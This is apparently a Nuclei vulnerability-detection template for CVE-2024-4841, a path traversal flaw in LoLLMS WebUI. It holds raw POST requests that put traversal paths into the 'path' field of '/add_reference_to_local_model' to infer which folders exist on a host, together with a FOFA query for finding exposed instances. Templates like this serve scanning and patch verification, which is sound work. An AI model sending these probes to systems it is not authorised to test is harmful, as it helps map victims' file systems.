id: CVE-2024-4841 info: name: LoLLMS WebUI - Subfolder Prediction via Path Traversal author: s4e-io severity: medium description: | A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest. remediation: | Apply the latest security patches and updates from the vendor to address this vulnerability. impact: | By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint. reference: - https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602 - https://nvd.nist.gov/vuln/detail/CVE-2024-4841 classification: cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 4 cve-id: CVE-2024-4841 cwe-id: CWE-29 epss-score: 0.08457 epss-percentile: 0.92491 metadata: max-request: 1 fofa-query: "LoLLMS WebUI - Welcome" tags: cve,cve2024,lollms-webui,traversal,vuln,ai,vkev variables: folder: "{{to_upper(rand_text_alpha(10))}}" flow: http(1) && http(2) http: - raw: - | POST /add_reference_to_local_model HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"path":"\\Users"} matchers: - type: dsl dsl: - 'contains(body, "{\"status\":true}")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and - raw: - | POST /add_reference_to_local_model HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"path":"\\{{folder}}"} matchers: - type: dsl dsl: - 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and # digest: 490a0046304402206d9119191078abf2d195deeb320bd38099a7f0f041478cc47e295e0d0e24e82402200bbb95aad49c3c8de7ed69f302516d515c86004c66a138c25697fdd747b12c43:922c64590222798bb761d5b6d8e72950